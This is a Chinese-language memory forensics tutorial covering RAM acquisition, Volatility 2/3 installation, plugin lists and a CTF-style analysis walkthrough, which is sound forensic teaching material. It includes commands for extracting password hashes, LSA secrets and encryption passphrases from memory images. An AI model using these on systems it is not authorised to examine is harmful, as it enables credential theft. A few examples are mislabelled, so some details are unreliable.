dd if=/dev/fmem of=/root/cyq.vmem bs=1MB count=2048    # 将内存里的数据拷贝到 root 目录下的 cyq.vmem 文件

Vmware

VMWare 虚拟机在暂停或挂起时, 内存状态信息会保存在以. Vmss 为扩展名的文件中; 在建立系统快照时, 包括内存在内的系统状态信息会保存在以. Vmsn 为扩展名的文件中; 而虚拟客户机的所有内存信息会保存在以. Vmem 为扩展名的文件中

相关工具

vmss2core - 快照文件转换为内存转储,开发人员可以使用此工具将虚拟机检查点转换为核心转储文件，从而对客户机操作系统和应用程序进行调试。检查点可以是快照或挂起文件。

# vmss 是挂起,vmsn 是快照,vmem 是虚拟机内存转储

vmss2core.exe -W virtual_machine_name.vmss virtual_machine_name.vmem
    # 注意："2195" for Win32, "6000" for Win64
    vmss2core.exe -W2195 virtual_machine_name.vmss virtual_machine_name.vmem
    vmss2core.exe -W6000 virtual_machine_name.vmss virtual_machine_name.vmem
    # 注意：如果你使用的是 Microsoft Windows 8/8.1、Windows Server 2012、Windows Server 2016 或 Windows Server 2019
    vmss2core.exe -W8 virtual_machine_name.vmss virtual_machine_name.vmem

# 注意：如果使用的是 Linux，请运行如下命令：
./vmss2core-Linux64 -N virtual_machine_name.vmss

# 要在虚拟机位于 ESX/ESXi 主机上时创建内存转储
# 启动与主机的 SSH 会话。
vm-support -x               # 确定虚拟机的域 ID
    # 注意：对于 ESXi 6.7，请使用命令 esxcli vm process list
vm-support -Z [world_ID]    # 挂起虚拟机
# 将 virtual_machine_name.vmss 文件复制到你的 vmss2core 工具所在的位置
vmss2core -W virtual_machine_name.vmss  # 运行 vmss2core 工具

Bin2Dmp

1
2

# 据说可以从 vmem 转为 dmp,但我测试时未成功
Bin2Dmp.exe vmware.vmem vmware.dmp

Volatility

1
2

# 需要指定 profile
volatility_standalone.exe -f vmware.vmem --profile=Win7SP1x64 raw2dmp -O vmware.dmp

VirtualBox

相关工具

vboxmanage + vboxelf2raw.sh + Volatility

vboxmanage debugvm "win7test" dumpvmcore --filename testvbox.elf
# VirtualBox 内存转储采用 ELF 格式，其中 load1 段保存原始内存转储。
./vboxelf2raw.sh testvbox.elf
volatility_standalone.exe -f testvbox.elf.raw --profile=Win7SP1x64 raw2dmp -O testvbox.dmp

内存分析

内存取证工具

Volatility - Volatility Framwork 是一款开源的基于 Python 开发的内存分析框架，它自带的分析插件支持分析内存镜像中所保留的历史网络连接信息、历史进程、历史命令记录等等。
Elcomsoft Forensic Disk Decryptor - 即时访问保存在加密的 BitLocker，FileVault 2，PGP，TrueCrypt 和 VeraCrypt 存储中的数据。该工具从 RAM 捕获数据，休眠和页面文件中提取加密密钥，或使用纯文本密码或托管密钥来解密存储在加密容器中的文件和文件夹，或者将加密卷装载为新的驱动器号，以便进行实时访问。
gleeda/memtriage - 集成了 Winpmem 和 Volatility 的工具
WinHex
取证大师
makomk/aeskeyfind - 该工具用于在内存转储中寻找 AES 密钥

Volatility

简介

Volatility 是一个用于事件响应和恶意软件分析的开源内存取证框架。它是用 Python 编写的，支持 Microsoft Windows，macOS 和 Linux，volatility 框架是一个完全开放的工具集合，在 GNU 通用许可证下用 Python 实现，用于从易失性存储器（RAM）样本中提取数字镜像。提取技术完全独立于被取证的系统而执行，但可以查看到系统运行时的状态信息。该框架旨在向人们介绍从内存样本中提取的数字镜像相关的技术，并为进一步研究该领域提供一个平台，它可以分析 .raw、.vmem、.img 后缀的文件。

支持原始数据转储(Raw Dump)、崩溃转储(Crash Dump)、休眠文件及各种其它格式，甚至可以支持多个格式之间的转换。

安装及维护

Ubuntu 下安装

apt-get install -y volatility
apt-get install -y python-dev
apt-get install -y python3-dev
python2 -m pip install distorm3 yara pycrypto openpyxl ujson pil
python2 -m pip install Crypto
python2 -m pip install pycryptodome
python2 -m pip install pytz
python2 -m pip install Pillow
python2 -m pip install yara-python

cd /tmp
git clone https://github.com/gdabah/distorm
cd distorm
python2 -m pip install distorm3

volatility --info

kali 下安装

cd /tmp
wget https://bootstrap.pypa.io/get-pip.py
python2 get-pip.py
python2 -m pip install --upgrade pip
apt-get install -y python-dev
apt-get install -y python3-dev
python2 -m pip install distorm3 yara pycrypto openpyxl ujson pil
python2 -m pip install Crypto
python2 -m pip install pycryptodome
python2 -m pip install pytz
python2 -m pip install Pillow
python2 -m pip install yara-python

cd /tmp
git clone https://github.com/gdabah/distorm
cd distorm
python2 -m pip install distorm3

cd
git clone https://github.com/volatilityfoundation/volatility.git
cd volatility
python setup.py build
python setup.py install

python vol.py --info

centos 下安装

yum install -y kernel-devel
yum install -y make gcc gcc-c++
yum groupinstall -y "Development Tools"
yum install -y yum-utils
yum install -y pcre-devel libpcre++-devel python-devel pycrypto

pip install --upgrade pip
python2 -m pip install distorm3==3.4.4
python2 -m pip install yara pycrypto openpyxl ujson pil
python2 -m pip install Crypto
python2 -m pip install pycryptodome
python2 -m pip install pytz
python2 -m pip install Pillow
python2 -m pip install yara-python

cd
git clone https://github.com/volatilityfoundation/volatility.git
cd volatility
python setup.py build
python setup.py install

python vol.py --info

windows 下安装

直接访问官网下载二进制文件 https://www.volatilityfoundation.org/releases

使用

基本用法

volatility -f [image] --profile=[profile] [plugin]
    eg：volatility -f /opt/test.vmem -profile=Win7SP1x86 pslist

    -h      # 查看相关参数及帮助说明
    -info   # 查看相关模块名称及支持的 Windows 版本
    -f      # 指定要打开的内存镜像文件及路径
    -d      # 开启调试模式
    -v      # 开启显示详细信息模式 (verbose)

# 如果是从 github 下载的
python vol.py -f [image] ‐-profile=[profile] [plugin]

Volatility 支持的插件列表

amcache             # 查看 AmCache 应用程序痕迹信息
apihooks            # 检测内核及进程的内存空间中的 API hook
atoms               # 列出会话及窗口站 atom 表
atomscan            # Atom 表的池扫描(Pool scanner)
auditpol            # 列出注册表 HKLM\SECURITY\Policy\PolAdtEv 的审计策略信息
bigpools            # 使用 BigPagePoolScanner 转储大分页池(big page pools)
bioskbd             # 从实时模式内存中读取键盘缓冲数据(早期电脑可以读取出 BIOS 开机密码)
cachedump           # 获取内存中缓存的域帐号的密码哈希
callbacks           # 打印全系统通知例程
clipboard           # 提取 Windows 剪贴板中的内容
cmdline             # 显示进程命令行参数
cmdscan             # 提取执行的命令行历史记录（扫描_COMMAND_HISTORY 信息）
connections         # 打印系统打开的网络连接(仅支持 Windows XP 和 2003)
connscan            # 打印 TCP 连接信息
consoles            # 提取执行的命令行历史记录（扫描_CONSOLE_INFORMATION 信息）
crashinfo           # 提取崩溃转储信息
deskscan            # tagDESKTOP 池扫描(Poolscaner)
devicetree          # 显示设备树信息
dlldump             # 从进程地址空间转储动态链接库
dlllist             # 打印每个进程加载的动态链接库列表
driverirp           # IRP hook 驱动检测
drivermodule        # 关联驱动对象至内核模块
driverscan          # 驱动对象池扫描
dumpcerts           # 提取 RAS 私钥及 SSL 公钥
dumpfiles           # 提取内存中映射或缓存的文件
dumpregistry        # 转储内存中注册表信息至磁盘
editbox             # 查看 Edit 编辑控件信息 (Listbox 正在实验中)
envars              # 显示进程的环境变量
eventhooks          # 打印 Windows 事件 hook 详细信息
evtlogs             # 提取 Windows 事件日志(仅支持 XP/2003)
filescan            # 提取文件对象（file objects）池信息
gahti               # 转储用户句柄（handle）类型信息
gditimers           # 打印已安装的 GDI 计时器 (timers) 及回调(callbacks)
gdt                 # 显示全局描述符表(Global Descriptor Table)
getservicesids      # 获取注册表中的服务名称并返回 SID 信息
getsids             # 打印每个进程的 SID 信息
handles             # 打印每个进程打开的句柄的列表
hashdump            # 转储内存中的 Windows 帐户密码哈希(LM/NTLM)
hibinfo             # 转储休眠文件信息
hivedump            # 打印注册表配置单元信息
hivelist            # 打印注册表配置单元列表
hivescan            # 注册表配置单元池扫描
hpakextract         # 从 HPAK 文件（Fast Dump 格式）提取物理内存数据
hpakinfo            # 查看 HPAK 文件属性及相关信息
idt                 # 显示中断描述符表(Interrupt Descriptor Table)
iehistory           # 重建 IE 缓存及访问历史记录
imagecopy           # 将物理地址空间导出原生 DD 镜像文件
imageinfo           # 查看 / 识别镜像信息
impscan             # 扫描对导入函数的调用
joblinks            # 打印进程任务链接信息
kdbgscan            # 搜索和转储潜在 KDBG 值
kpcrscan            # 搜索和转储潜在 KPCR 值
ldrmodules          # 检测未链接的动态链接 DLL
lsadump             # 从注册表中提取 LSA 密钥信息（已解密）
machoinfo           # 转储 Mach-O 文件格式信息
malfind             # 查找隐藏的和插入的代码
mbrparser           # 扫描并解析潜在的主引导记录(MBR)
memdump             # 转储进程的可寻址内存
memmap              # 打印内存映射
messagehooks        # 桌面和窗口消息钩子的线程列表
mftparser           # 扫描并解析潜在的 MFT 条目
moddump             # 转储内核驱动程序到可执行文件的示例
modscan             # 内核模块池扫描
modules             # 打印加载模块的列表
multiscan           # 批量扫描各种对象
mutantscan          # 对互斥对象池扫描
notepad             # 查看记事本当前显示的文本
objtypescan         # 扫描窗口对象类型对象
patcher             # 基于页面扫描的补丁程序内存
poolpeek            # 可配置的池扫描器插件
printkey            # 打印注册表项及其子项和值
privs               # 显示进程权限
procdump            # 进程转储到一个可执行文件示例
pslist              # 按照 EPROCESS 列表打印所有正在运行的进程
psscan              # 进程对象池扫描
pstree              # 以树型方式打印进程列表
psxview             # 查找带有隐藏进程的所有进程列表
qemuinfo            # 转储 Qemu 信息
raw2dmp             # 将物理内存原生数据转换为 windbg 崩溃转储格式
screenshot          # 基于 GDI Windows 的虚拟屏幕截图保存
servicediff         # Windows 服务列表(ala Plugx)
sessions            # _MM_SESSION_SPACE 的详细信息列表(用户登录会话)
shellbags           # 打印 Shellbags 信息
shimcache           # 解析应用程序兼容性 Shim 缓存注册表项
shutdowntime        # 从内存中的注册表信息获取机器关机时间
sockets             # 打印已打开套接字列表
sockscan            # TCP 套接字对象池扫描
ssdt                # 显示 SSDT 条目
strings             # 物理到虚拟地址的偏移匹配(需要一些时间，带详细信息)
svcscan             # indows 服务列表扫描
symlinkscan         # 符号链接对象池扫描
thrdscan            # 线程对象池扫描
threads             # 调查_ETHREAD 和_KTHREADs
timeliner           # 创建内存中的各种痕迹信息的时间线
timers              # 打印内核计时器及关联模块的 DPC
truecryptmaster     # 恢复 TrueCrypt 7.1a 主密钥
truecryptpassphrase # 查找并提取 TrueCrypt 密码
truecryptsummary    # TrueCrypt 摘要信息
unloadedmodules     # 打印卸载的模块信息列表
userassist          # 打印注册表中 UserAssist 相关信息
userhandles         # 转储用户句柄表
vaddump             # 转储 VAD 数据为文件
vadinfo             # 转储 VAD 信息
vadtree             # 以树形方式显示 VAD 树信息
vadwalk             # 显示遍历 VAD 树
vboxinfo            # 转储 Virtualbox 信息（虚拟机）
verinfo             # 打印 PE 镜像中的版本信息
vmwareinfo          # 转储 VMware VMSS/VMSN 信息
volshell            # 内存镜像中的 shell
windows             # 打印桌面窗口(详细信息)
wintree             # Z 顺序打印桌面窗口树
wndscan             # 池扫描窗口站
yarascan            # 以 Yara 签名扫描进程或内核内存

Linux 内存取证插件参数

# 获取系统进程信息相关命令
linux_pstree        # 进程树列表
linux_pslist_cache  # 来自的 kmem_cache 活动进程
linux_psxview       # 比较进程列表
linux_lsof          # 打开文件描述符的每个活动进程
linux_pslist        # 活动的进程列表
linux_psaux         # 活动的进程列表（输出内容包括更多的细节）

# 获取系统内存信息的相关命令
linux_memmap        # 内存映射文件
linux_pidhashtable  # Linux 内核中的 PID 散列表
linux_proc_maps     # 转储由-s/-vma 参数到磁盘上指定的内存范围。
linux_dump_map      # 进程内存的详细信息，包括堆和共享库。
linux_bash          # bash 历史文件

# 获取网络接口信息的相关命令
linux_arp           # 显示 arp 列表
linux_ifconfig      # 显示网络接口详细情况
linux_route_cache   # 显示网络路由表
linux_netstat       # 查看网络链接情况

# 获取系统硬件信息的相关命令
linux_cpuinfo       # 显示 cpu 的相关命令信息。
linux_dmesg         # 显示内核缓存信息。
linux_iomem         # 显示 io 设备信息。
linux_mount         # 显示/proc/mouns 的相关命令信息，主要是挂载的磁盘设备。
linux_mount_cache   # 显示 kmem_cache 的相关命令信息。
linux_slabinfo      # 显示/proc/slabinfo 的相关命令信息。

# rootkit 检测的相关命令
linux_check_afinfo  # 检查篡改网络协议结构。
linux_check_creds   # 检查进程共享结构。
linux_check_fop     # 检查文件操作数据结构篡改情况。
linux_check_idt     # 检查中断描述符表（IDT）的篡改情况。
linux_check_syscall # 在系统调用表检查功能情况。
linux_check_modules # 检查用于从内核模块列表中缺少在 sysfs 中的项目。

# 获取内核模块信息的相关命令
linux_lsmod         # 加载内核模块。
linux_tmpfs         # tmpfs 的内容。

获取镜像信息

首先获取镜像的摘要信息，一般这是进行镜像分析的第一步

`1`	`volatility -f [image] imageinfo`

这其中比较有用的信息就是 Suggested Profile(s) ，这个是工具识别的系统版本，存在多个的原因是这是根据一些特征识别的，所以可能有误报，就把各种结果按照可能性排列出来了，一般直接选择第一个，如果加载插件报错的话，可以尝试后面的。

这里根据给出的结果选择第一个，然后使用 pslist 插件，看一下系统中运行的进程。

进程

按照 EPROCESS 列表列出所有正在运行的进程

`1`	`volatility -f [image] --profile=[profile] pslist`

如图中 lsass.exe、winlogon.exe ,在 windows 本地登录时，用户的密码存储在 %SystemRoot%\system32\config\SAM 这个文件里。当用户输入密码进行本地认证的过程中，所有的操作都是在本地进行的。他其实就是将用户输入的密码转换为 NTLM Hash，然后与 SAM 中的 NTLM Hash 进行比较。当用户注销、重启、锁屏后，操作系统会让 winlogon 显示登录界面，也就是输入框。当 winlogon.exe 接收输入后，将密码交给 lsass 进程，这个进程中会存一份明文密码，将明文密码加密成 NTLM Hash，对 SAM 数据库比较认证。

notepad.exe 是指正在运行一个记事本程序，而 mspaint.exe 是指是微软画图程序， cmd.exe 指正在运行命令行程序

显示隐藏/终止的进程

`1`	`volatility -f [image] --profile=[profile] psscan`

以 dot 图的形式导出

1
2
3

python vol.py -f [image] --profile=[profile] psscan --output=dot --output-file=out.dot

apt install -y xdot

把进程以树的形式显示

`1`	`volatility -f [image] --profile=[profile] pstree`

查看 DLL 文件

当我们发现可疑进程后，可通过此命令进行深度查看

`1`	`volatility -f [image] --profile=[profile] dlllist -p [pid]`

转储出可寻址的内存数据

在上面的进程中可以看到，存在一个 mspaint.exe 的进程，它是微软的画图软件，对于这样的情况，可以使用工具还原内存中的图片, 来当时查看的图片或者当时状态的图片，使用的工具是 gimp，可以在 linux 上安装使用。

这里首先将 mspaint.exe 的进程内存 dump 出来，使用 memdump 插件，在之前列举进程的截图中，进程名字后面一行就是该进程的 PID。

`1`	`volatility -f [image] --profile=[profile] memdump -p [pid] --dump-dir ./`

将获取到的 2276.dmp 文件改名为 2276.data，然后在 gime 中点击显示全部文件，选择 2276.data 打开

add-apt-repository ppa:otto-kesselgulasch/gimp
apt-get update
apt-get install -y gimp     # 安装 gimp
gimp                        # 启动 gimp
mv 2276.dmp 2276.data

首先选择一个固定的宽度，这里选择 1000，然后调节高度把屏幕铺满，然后再大幅度拖动 Image 下的 Offset 的滑块，当看到图片类似下图时停止，可以看到隐隐约约有一张图，但是有点重叠，这时，点击上下箭头缓慢调节 Width，其中 Heigth 在调节中作用是不大的，主要是 Width 和 Offset 的调节决定是否能看到图片

微调位移为图像的左右方向平移，大幅调节位移则是图像的上下方向平移。而宽度不变时，始终显示的都是同一幅图像。

在调节时，不仅仅只能看到画图程序的图片，如下图，就调出了另一个状态的一个系统图片

获取运行过的命令

在上面查看进程时，可以看到存在一个 cmd 进程，那么可以使用 cmdscan 插件来查看运行过的命令，

`1`	`volatility -f [image] --profile=[profile] cmdscan`

可以看到执行了 whoami、ifconfig、ipconfig 这三个命令

查看进程命令行参数

`1`	`volatility -f [image] --profile=[profile] cmdline`

信息

获取记事本数据

volatility -f [image] --profile=[profile] notepad

# 当上面这个插件不支持这个系统，这时可以使用 editbox 查看

volatility -f [image] --profile=[profile] editbox

查看当前桌面截图

可以使用 screenshot 查看查看当前桌面的伪截图，其中会显示桌面上窗口的框，不会显示其中的内容

`1`	`volatility -f [image] --profile=[profile] screenshot --dump-dir ./`

获取系统中的用户以及密码

`1`	`volatility -f [image] --profile=[profile] hashdump`

查看剪切版中的信息

`1`	`volatility -f [image] --profile=[profile] clipboard`

扫一下 ie 浏览记录

`1`	`volatility -f [image] --profile=[profile] yarascan`

文件

查看系统中的文件

通过 filescan 命令，可以扫描当前状态下的一些文件，例如桌面的文件，或者特定类型的文件，这些都是结合 grep 命令来实现的

`1`	`volatility -f [image] --profile=[profile] filescan \| grep -E "zip\|txt\|doc\|pdf"`

查看桌面的文件

`1`	`volatility -f [image] --profile=[profile] filescan \| grep "Desktop"`

dump 扫描到的文件

在上一步中，发现了桌面的一个 flag.txt，那么可以使用 dumpfiles 命令来将文件 dump 出来

1
2
3

volatility -f [image] --profile=[profile] dumpfiles -Q 0x000000007de00130 --dump-dir ./

# 这里的 -Q 参数是前面扫描时候的第一个参数，标记了文件的转储的物理地址

dump 出的文件默认是 dat 后缀的，可以使用 linux 下的 file 命令来查看获取的文件类型，或者是根据之前扫描文件获取到的文件名来修改后缀

转储内存中的进程里 exe 文件

`1`	`volatility -f [image] --profile=[profile] procdump -p [pid] --dump-dir ./`

网络

查看系统开放端口以及连接情况

`1`	`volatility -f [image] --profile=[profile] netscan`

注册表信息

打印注册表项及其子项和对应的值

`1`	`volatility -f [image] --profile=[profile] printkey -K "SAM\Domains\Account\Users\Names"`

列出注册表配置文件中的注册表信息

`1`	`volatility -f [image] --profile=[profile] hivelist`

打印内存中指定的注册表信息

1
2

volatility -f [image] --profile=[profile] hivedump -o 0xfffff8a000bff010
# -o 跟虚拟地址

Linux Profile

使用第三方 Profile

在 https://github.com/KDPryor/LinuxVolProfiles 处直接下载已经做好的 profile 文件（zip 文件）然后复制到目录后解压缩即可。

git clone https://github.com/KDPryor/LinuxVolProfiles.git
cd LinuxVolProfiles
mv Ubuntu-3.8.0-19.zip /volatility/volatility/plugins/overlays/linux/
cd /volatility/volatility/plugins/overlays/linux
unzip Ubuntu-3.8.0-19.zip

制作 Profile

Volatility 自带一些 windows 系统的 profile，Linux 系统的 Profile 需要自己制作，制作的方法如下：实际是将 module.dwarf 和 system.map 打包成一个 zip 文件，接着将 zip 文件移动到 volatility/plugins/overlays/linux/ 目录中。

这里以 centos7 为例,先安装 dwarfdump(必须安装，创建 module.dwarf 文件的依赖)

yum install -y gcc make gcc-c++
yum install -y elfutils-devel
yum install -y kernel-devel
wget https://www.prevanders.net/libdwarf-20201201.tar.gz
tar -zxvf libdwarf-20201201.tar.gz
cd libdwarf-20201201
./configure
make
make install
cd ../

在 volatility 目录中的 tool/Linux 运行 make 命令来创建 module.dwarf 文件

git clone https://github.com/volatilityfoundation/volatility.git
cd volatility/tools/linux

make
ls -l

打包,将 centos7.zip 移至分析机的 volatility/plugins/overlays/linux/ 目录中

`1`	`zip centos7.zip /boot/System.map* module.dwarf`

在分析机上将 centos7.zip 至 volatility/plugins/overlays/linux/ 目录中

1
2

mv centos7.zip /pentest/volatility/plugins/overlays/linux/
python vol.py --info | grep "centos7"

实战 linux 分析

住:这里 LiME 导出的无法成功解析,不知道原因

直接复制 centos7 的内存文件，放到分析机上，查看进程树列表

`1`	`python vol.py -f tmp.vmem --profile=Linuxcentos7x64 linux_pstree`

显示网络接口详细情况

`1`	`python vol.py -f tmp.vmem --profile=Linuxcentos7x64 linux_pstree`

查看某具体进程的情况

`1`	`python vol.py -f tmp.vmem --profile=Linuxcentos7x64 linux_proc_maps`

volatility3

Volatility3 是对 Volatility2 的重写，它基于 Python3 编写，对 Windows 10 的内存取证很友好，且速度比 Volatility2 快很多。对于用户而言，新功能的重点包括：大幅提升性能，消除了对 –profile 的依赖，以便框架确定需要哪个符号表（配置文件）来匹配内存示例中的操作系统版本，在 64 位系统（例如 Window 的 wow64）上正确评估 32 位代码，自动评估内存中的代码，以避免对分析人员进行尽可能多的手动逆向工程。对于开发人员：更加轻松地集成到用户的第三方接口和库中，广泛的 API 文档，插件可以直接调用其他插件的能力，插件版本控，直接集成自定义符号表和数据结构。

安装

git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
python3 setup.py build
python3 setup.py install
python3 vol.py -h

符号表集

cd /tmp
wget downloads.volatilityfoundation.org/volatility3/symbols/windows.zip
wget downloads.volatilityfoundation.org/volatility3/symbols/mac.zip
wget downloads.volatilityfoundation.org/volatility3/symbols/linux.zip
mkdir -p /pentest/volatility3/symbols
mv /tmp/windows.zip /pentest/volatility3/symbols
mv /tmp/mac.zip /pentest/volatility3/symbols
mv /tmp/linux.zip /pentest/volatility3/symbols

常用插件

banners.Banners                                 Attempts to identify potential linux banners in an image
configwriter.ConfigWriter                       Runs the automagics and both prints and outputs configuration in the output directory.
frameworkinfo.FrameworkInfo                     Plugin to list the various modular components of Volatility
isfinfo.IsfInfo                                 Determines information about the currently available ISF files, or a specific one
layerwriter.LayerWriter                         Runs the automagics and writes out the primary layer produced by the stacker.
linux.bash.Bash                                 Recovers bash command history from memory.
linux.check_afinfo.Check_afinfo                 Verifies the operation function pointers of network protocols.
linux.check_creds.Check_creds                   Checks if any processes are sharing credential structures
linux.check_idt.Check_idt                       Checks if the IDT has been altered
linux.check_modules.Check_modules               Compares module list to sysfs info, if available
linux.check_syscall.Check_syscall               Check system call table for hooks.
linux.elfs.Elfs                                 Lists all memory mapped ELF files for all processes.
linux.keyboard_notifiers.Keyboard_notifiers     Parses the keyboard notifier call chain
linux.lsmod.Lsmod                               Lists loaded kernel modules.
linux.lsof.Lsof                                 Lists all memory maps for all processes.
linux.malfind.Malfind                           Lists process memory ranges that potentially contain injected code.
linux.proc.Maps                                 Lists all memory maps for all processes.
linux.pslist.PsList                             Lists the processes present in a particular linux memory image.
linux.pstree.PsTree                             Plugin for listing processes in a tree based on their parent process ID.
linux.tty_check.tty_check                       Checks tty devices for hooks
mac.bash.Bash                                   Recovers bash command history from memory.
mac.check_syscall.Check_syscall                 Check system call table for hooks.
mac.check_sysctl.Check_sysctl                   Check sysctl handlers for hooks.
mac.check_trap_table.Check_trap_table           Check mach trap table for hooks.
mac.ifconfig.Ifconfig                           Lists loaded kernel modules
mac.kauth_listeners.Kauth_listeners             Lists kauth listeners and their status
mac.kauth_scopes.Kauth_scopes                   Lists kauth scopes and their status
mac.kevents.Kevents                             Lists event handlers registered by processes
mac.list_files.List_Files                       Lists all open file descriptors for all processes.
mac.lsmod.Lsmod                                 Lists loaded kernel modules.
mac.lsof.Lsof                                   Lists all open file descriptors for all processes.
mac.malfind.Malfind                             Lists process memory ranges that potentially contain injected code.
mac.mount.Mount                                 A module containing a collection of plugins that produce data typically foundin Mac's mount command
mac.netstat.Netstat                             Lists all network connections for all processes.
mac.proc_maps.Maps                              Lists process memory ranges that potentially contain injected code.
mac.psaux.Psaux                                 Recovers program command line arguments.
mac.pslist.PsList                               Lists the processes present in a particular mac memory image.
mac.pstree.PsTree                               Plugin for listing processes in a tree based on their parent process ID.
mac.socket_filters.Socket_filters               Enumerates kernel socket filters.
mac.timers.Timers                               Check for malicious kernel timers.
mac.trustedbsd.Trustedbsd                       Checks for malicious trustedbsd modules
mac.vfsevents.VFSevents                         Lists processes that are filtering file system events
timeliner.Timeliner                             Runs all relevant plugins that provide time related information and orders the results by time.
windows.bigpools.BigPools                       List big page pools.
windows.cachedump.Cachedump                     Dumps lsa secrets from memory
windows.callbacks.Callbacks                     Lists kernel callbacks and notification routines.
windows.cmdline.CmdLine                         Lists process command line arguments.
windows.dlllist.DllList                         Lists the loaded modules in a particular windows memory image.
windows.driverirp.DriverIrp                     List IRPs for drivers in a particular windows memory image.
windows.driverscan.DriverScan                   Scans for drivers present in a particular windows memory image.
windows.dumpfiles.DumpFiles                     Dumps cached file contents from Windows memory samples.
windows.envars.Envars                           Display process environment variables
windows.filescan.FileScan                       Scans for file objects present in a particular windows memory image.
windows.getservicesids.GetServiceSIDs           Lists process token sids.
windows.getsids.GetSIDs                         Print the SIDs owning each process
windows.handles.Handles                         Lists process open handles.
windows.hashdump.Hashdump                       Dumps user hashes from memory
windows.info.Info                               Show OS & kernel details of the memory sample being analyzed.
windows.lsadump.Lsadump                         Dumps lsa secrets from memory
windows.malfind.Malfind                         Lists process memory ranges that potentially contain injected code.
windows.memmap.Memmap                           Prints the memory map
windows.modscan.ModScan                         Scans for modules present in a particular windows memory image.
windows.modules.Modules                         Lists the loaded kernel modules.
windows.mutantscan.MutantScan                   Scans for mutexes present in a particular windows memory image.
windows.netscan.NetScan                         Scans for network objects present in a particular windows memory image.
windows.netstat.NetStat                         Traverses network tracking structures present in a particular windows memory image.
windows.poolscanner.PoolScanner                 A generic pool scanner plugin.
windows.privileges.Privs                        Lists process token privileges
windows.pslist.PsList                           Lists the processes present in a particular windows memory image.
windows.psscan.PsScan                           Scans for processes present in a particular windows memory image.
windows.pstree.PsTree                           Plugin for listing processes in a tree based on their parent process ID.
windows.registry.certificates.Certificates      Lists the certificates in the registry's Certificate Store.
windows.registry.hivelist.HiveList              Lists the registry hives present in a particular memory image.
windows.registry.hivescan.HiveScan              Scans for registry hives present in a particular windows memory image.
windows.registry.printkey.PrintKey              Lists the registry keys under a hive or specific key value.
windows.registry.userassist.UserAssist          Print userassist registry keys and information.
windows.ssdt.SSDT                               Lists the system call table.
windows.statistics.Statistics
windows.strings.Strings                         Reads output from the strings command and indicates which process(es) each string belongs to.
windows.svcscan.SvcScan                         Scans for windows services.
windows.symlinkscan.SymlinkScan                 Scans for links present in a particular windows memory image.
windows.vadinfo.VadInfo                         Lists process memory ranges.
windows.vadyarascan.VadYaraScan                 Scans all the Virtual Address Descriptor memory maps using yara.
windows.verinfo.VerInfo                         Lists version information from PE files.
windows.virtmap.VirtMap                         Lists virtual mapped sections.
yarascan.YaraScan                               Scans kernel memory using yara rules (string or file).

使用

volatility3 运行时需要下载 PDB 符号表，国内机器需要挂代理

信息

layerwriter

`1`	`python3 vol.py -f [image] layerwriter`

windows.info

`1`	`python3 vol.py -f [image] windows.info`

windows.pslist

`1`	`python3 vol.py -f [image] windows.pslist`

windows.hashdump

`1`	`python3 vol.py -f [image] windows.hashdump`

windows.filescan

`1`	`python3 vol.py -f [image] windows.filescan`

Symbol Tables

所有文件都以 JSON 数据的形式存储，它们可以是. json 的纯 JSON 文件，也可以是. json.gz 或. json.xz 的压缩文件。Volatility 会在使用时自动解压它们。使用时也会将它们的内容（压缩后）缓存起来，位于用户主目录下的. cache/volatility3 中，以及其他有用的数据。缓存目录目前无法更改。

符号表 JSON 文件默认位于 volatility/symbols 下，在操作系统目录下（目前是 windows、mac 或 linux 中的一种）。符号目录是可以在框架内配置的，通常可以在用户界面上设置。

这些文件也可以被压缩成 ZIP 文件，Volatility 将处理 ZIP 文件以定位符号文件。ZIP 文件必须以相应的操作系统命名（如 linux.zip、mac.zip 或 windows.zip）。在 ZIP 文件中，目录结构应与未压缩的操作系统目录一致。

Windows 符号表

对于 Windows 系统，Volatility 接受由 GUID 和所需 PDB 文件的 Age 组成的字符串。然后，它在 Windows 子目录下的已配置符号目录下搜索所有文件。与文件名模式 /-.json（或任何压缩变体）匹配的任何文件都会被使用。如果找不到这样的符号表，则将从 Microsoft 的 Symbol Server 下载关联的 PDB 文件，并将其转换为适当的 JSON 格式，并将其保存在正确的位置。

Windows 符号表可以从适当的 PDB 文件手动构建。用于执行此操作的主要工具内置于 Volatility 3 中，称为 pdbconv.py。
Mac / Linux 符号表

对于 Mac / Linux 系统，两者都使用相同的识别机制。JSON 文件位于符号目录下的 linux 或 mac 目录下。生成的文件包含一个标识字符串（操作系统横幅），Volatility 的 automagic 可以检测到该字符串。易失性会缓存字符串和它们来自的符号表之间的映射，这意味着精确的文件名无关紧要，并且可以在操作系统目录下的任何必要层次结构下进行组织。

可以使用称为 dwarf2json 的工具从 DWARF 文件生成 Linux 和 Mac 符号表。当前，带有调试符号的内核是恢复大多数 Volatility 插件所需的所有信息的唯一合适方法。找到具有调试符号 / 适当的 DWARF 文件的内核之后，dwarf2json 会将其转换为适当的 JSON 文件。

相关工具

volatilityfoundation/dwarf2json

MacOS Processing

1
2

./dwarf2json mac --macho /path/kernel.dSYM/Contents/Resources/DWARF/kernel \
    --macho-symbols /path/kernel > output.json

Linux Processing

`1`	`./dwarf2json linux --elf /usr/lib/debug/boot/vmlinux-4.4.0-137-generic > output.json`

安装 vmlinux

这里我以 ubuntu18.04 为例,系统默认有 vmlinuz,但 vmlinux 与 vmlinuz 不同,需要手动安装 vmlinux

# 添加ddebs存储库
echo "deb http://ddebs.ubuntu.com $(lsb_release -cs)-updates main restricted universe multiverse
deb http://ddebs.ubuntu.com $(lsb_release -cs)-security main restricted universe multiverse
deb http://ddebs.ubuntu.com $(lsb_release -cs)-proposed main restricted universe multiverse" | \
sudo tee -a /etc/apt/sources.list.d/ddebs.list

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 428D7C01

1
2
3

# 安装 kernel debug symbols
sudo apt-get update
sudo apt-get install linux-image-$(uname -r)-dbgsym

在 centos 中是

`1`	`sudo debuginfo-install kernel`

以 ubuntu18.04 为例

chmod +x dwarf2json
./dwarf2json linux --elf /usr/lib/debug/boot/vmlinux-5.0.0-23-generic > Ubuntu1804.json

# 这里有个小坑,内存尽量大于8G,不然会报错

mv Ubuntu1804.json /pentest/volatility3/volatility3/framework/symbols/linux
cd /pentest/volatility3
python3 vol.py -vvvv isfinfo
python3 vol.py -vvvv -s volatility3/framework/symbols/linux/ isfinfo
python3 vol.py isfinfo --isf /pentest/volatility3/volatility3/framework/symbols/linux/Ubuntu1804.json

`1`	`python3 vol.py -vvvv -f cyq.vmem banners`

即使输出与 banner 匹配, 实际运行依旧失败, 此 issues https://github.com/volatilityfoundation/volatility3/issues/413 具有同样问题, 等待软件后续更新解决把

1
2
3

